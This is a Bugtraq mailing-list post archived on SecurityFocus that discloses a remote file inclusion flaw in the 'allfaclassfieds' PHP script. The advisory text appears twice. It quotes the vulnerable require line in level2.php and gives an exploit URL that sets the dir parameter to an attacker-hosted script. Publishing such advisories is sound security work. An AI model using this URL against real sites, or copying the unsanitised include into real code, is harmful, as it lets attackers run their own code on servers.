Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
Back to list
|
Post reply
Allfaclassfieds (level2.php dir) remote file inclusion
Apr 22 2007 07:08AM
asdasd asdsadas (dr rover hackermail com)
Allfaclassfieds (level2.php dir) remote file inclusion
--
Bug Found By Dr.RoVeR -->Arab48 Hacker
Contact: Dr.RoVeR (at) HackerMail (dot) CoM [email concealed]
---
Script: allfaclassfieds
Download: http://scriptat.com/download.php?sid=718
--
Bug File: level2.php
Bug code in line 4:
require("$dir/admin/dp.php");
--
Exploit:
http://site.com/[path]/admin/setup/level2.php?dir=[EvilScript]
--
_______________________________________________
Get your free email from http://www.hackermail.com
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
--
Bug Found By Dr.RoVeR -->Arab48 Hacker
Contact: Dr.RoVeR (at) HackerMail (dot) CoM [email concealed]
---
Script: allfaclassfieds
Download: http://scriptat.com/download.php?sid=718
--
Bug File: level2.php
Bug code in line 4:
require("$dir/admin/dp.php");
--
Exploit:
http://site.com/[path]/admin/setup/level2.php?dir=[EvilScript]
--
_______________________________________________
Get your free email from http://www.hackermail.com
[ reply ]